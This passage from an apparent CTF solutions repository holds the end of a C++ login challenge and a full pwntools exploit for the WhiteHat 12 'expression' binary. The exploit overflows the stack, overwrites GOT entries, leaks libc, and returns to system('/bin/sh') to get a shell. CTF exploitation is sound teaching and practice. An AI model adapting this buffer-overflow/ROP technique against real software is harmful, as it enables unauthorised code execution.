108 | 
109 | 
110 | User login;
111 | 
112 | int main() {
113 | 	setbuf(stdout, nullptr);
114 | 
115 | 	char access_password[entry_len] = "todo: ldap and kerberos support";
116 | 
117 | 	Admin admin{"admin", access_password};
118 | 
119 | 	auto success = [] {
120 | 		printf("congrats!\n");
121 | 		login.shell();
122 | 	};
123 | 
124 | 	printf("please enter your username: ");
125 | 	login.read_name();
126 | 
127 | 	printf("please enter your password: ");
128 | 	auto check_pw = password_checker(success);
129 | 	login.read_password();
130 | 
131 | 	check_pw(login.get_password(), admin.get_password());
132 | }
133 | 


--------------------------------------------------------------------------------
/TUMCTF 2016/lolcpp/vuln.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/TUMCTF 2016/lolcpp/vuln.i64


--------------------------------------------------------------------------------
/WhiteHat 12/Pwn2/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from time import sleep
 3 | 
 4 | PROCESS_NAME = '/home/daniel/Desktop/expression'
 5 | DELETE_GOT_ENTRY = 0x0804A01C
 6 | PUTS_PLT_ADDR = 0x080485B0
 7 | GETS_GOT_ENTRY = 0x804A004
 8 | MAIN_ADDR = 0x8048694
 9 | LEAVE_RET_GADGET = 0x08048918
10 | SYSTEM_GETS_OFFSET = 148944
11 | BINSH_GETS_OFFSET = 1021516
12 | DELETE_PLT_ENTRY = 0x80485A6
13 | PUTS_PLT_ENTRY = 0x80485b6
14 | STRCMP_PLT_ENTRY = 0x80485c6
15 | 
16 | def exploit():
17 | 	p = process(PROCESS_NAME)
18 | 	
19 | 	# first tack - leak libc address
20 | 
21 | 	sleep(0.5)
22 | 	p.recv(2048, timeout=1)
23 | 	
24 | 	log.info('Overflowing the stack...') 
25 | 	p.sendline('A'*0x180 + p32(DELETE_GOT_ENTRY) + 0x10*'C' + p32(PUTS_PLT_ADDR) + p32(MAIN_ADDR) + p32(GETS_GOT_ENTRY))
26 | 
27 | 	sleep(0.5)
28 | 	p.recv(2048, timeout=1)
29 | 	
30 | 	log.info('Overwiting GOT/PLT entries...')
31 | 	p.sendline(p32(DELETE_PLT_ENTRY) + p32(PUTS_PLT_ENTRY) + p32(STRCMP_PLT_ENTRY) + p32(LEAVE_RET_GADGET))
32 | 
33 | 	sleep(0.5)
34 | 	p.recv(2048, timeout=1)
35 | 	log.info('Leak gets() address and return to main()')
36 | 
37 | 	p.sendline('q')
38 | 
39 | 	sleep(0.5)
40 | 	outp = p.recv(2048, timeout=1)
41 | 	gets_address = u32(outp[0:4])
42 | 	system_address = gets_address - SYSTEM_GETS_OFFSET
43 | 	binsh_address = gets_address + BINSH_GETS_OFFSET
44 | 	log.info('gets() address within libc - ' + hex(gets_address))
45 | 	log.info('system() address - ' + hex(system_address))
46 | 	log.info('bin/sh address - ' + hex(binsh_address))
47 | 
48 | 	# second tact - rop to system
49 | 
50 | 	log.info('Overflowing stack with system as return address')
51 | 	cmd = 'A'*0x180 + p32(DELETE_GOT_ENTRY) + 0x8*'C' + p32(system_address) + p32(MAIN_ADDR) + p32(binsh_address)
52 | 	p.sendline(cmd)
53 | 
54 | 	sleep(0.5)
55 | 	log.info('Got Shell :)')
56 | 	p.sendline('id')
57 | 	p.interactive()


--------------------------------------------------------------------------------
/WhiteHat 12/Pwn2/expression:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/WhiteHat 12/Pwn2/expression


--------------------------------------------------------------------------------
/WhiteHat 12/Pwn2/expression.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/WhiteHat 12/Pwn2/expression.idb


--------------------------------------------------------------------------------